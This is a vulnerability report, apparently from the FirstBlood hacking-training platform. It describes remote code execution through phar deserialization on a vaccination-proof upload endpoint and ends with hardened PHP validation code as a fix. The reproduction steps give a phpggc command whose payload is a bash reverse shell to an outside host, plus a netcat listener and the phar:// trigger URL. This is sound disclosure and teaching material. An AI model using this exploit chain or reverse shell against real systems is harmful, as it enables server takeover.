FirstBlood-#728 — Remote Command Execution via deserialization by uploading phar file
This issue was discovered on FirstBlood v2
On 2021-10-27, neolex Level 2 reported:
Description
It is possible for an attacker to get remote code execution by uploading a phar file via the https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/submit-vaccination-proof.php endpoint,
and then triggering the deserialization to get RCE using a phar://
URI on https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
Steps to reproduce
- Clone the following repository https://github.com/ambionics/phpggc and go inside the directory.
- Run the following command:
  ./phpggc -pj /tmp/dummy.jpg -o /tmp/z.zip.phar monolog/rce4 "bash -i >& /dev/tcp/neolex.dev/8000 0>&1"
  with dummy.jpg any valid jpg file, and replacing neolex.dev by your domain or IP.
- Listen on port 8000 inside your server via nc -lnvp 8000.
- Upload the following image (/tmp/z.zip.phar) inside https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
- Look inside the Burp proxy at the request made to /api/checkproof.php.
  For example, in my case the request is for the URL: https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
- Send this request to Repeater, add phar:// before the path and send the request:
  https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
- You should have a reverse shell inside your netcat listener.
Impact
Remote code execution. An attacker can completely take over the server and run a bash shell inside.
P1 CRITICAL
Endpoint: /api/checkproof.php
Parameter: proof
Payload: phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
FirstBlood ID: 34
Vulnerability Type: Deserialization
This endpoint calls filesize() on the path provided in the 'proof' param with no filtering or sanitisation. By adding the phar:// stream handler to the path, an attacker can force a previously uploaded file to be sent through deserialisation. Coupled with the fact that a gadget-chain vulnerable version of monolog is being used, this allows for RCE.
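The root cause above is a filesystem call on an attacker-controlled path that still honours PHP stream wrappers. As an added example (not FirstBlood's own code), the following validation layer shows how the 'proof' parameter could be resolved safely before any call to filesize(): the upload directory, the file-name pattern and the function names are assumptions for illustration, and the endpoint is changed to accept a bare file name rather than a full path.

```php
<?php
// Added example, not part of the FirstBlood application: hardened resolution
// of the 'proof' parameter before it reaches filesize() or similar functions.
// UPLOAD_DIR is an assumed location taken from the report's example path.
const UPLOAD_DIR = '/app/firstblood/upload';

/**
 * Returns the canonical absolute path of an uploaded proof, or null when the
 * supplied value must be rejected.
 */
function resolve_proof_path(string $proof, string $uploadDir = UPLOAD_DIR): ?string
{
    // 1. Refuse any stream wrapper (phar://, data://, http://, ...). Passing a
    //    phar:// path to filesize() is what makes PHP unserialize the archive
    //    metadata and fire the monolog gadget chain described in the report.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $proof)) {
        return null;
    }
    // 2. Accept only a bare file name: no directory components, no NUL bytes.
    $name = basename($proof);
    if ($name === '' || $name !== $proof || strpos($name, "\0") !== false) {
        return null;
    }
    // 3. Assumed naming scheme: uploads are stored as a 40-hex-char hash plus an
    //    image extension, as in the report's example file name.
    if (!preg_match('/^[0-9a-f]{40}\.(jpe?g|png)$/', $name)) {
        return null;
    }
    // 4. Canonicalise and confirm the file really lives inside the upload dir,
    //    so symlinks or traversal cannot escape it.
    $base = realpath($uploadDir);
    $path = realpath($uploadDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Endpoint usage: the client now names the uploaded file, not a server path.
$path = resolve_proof_path((string) ($_GET['proof'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('invalid proof');
}
echo filesize($path);
```

Rejecting the wrapper prefix alone is not enough on its own, since other wrappers and path tricks exist; the realpath() containment check and the strict file-name pattern are what keep the call confined to genuine uploads.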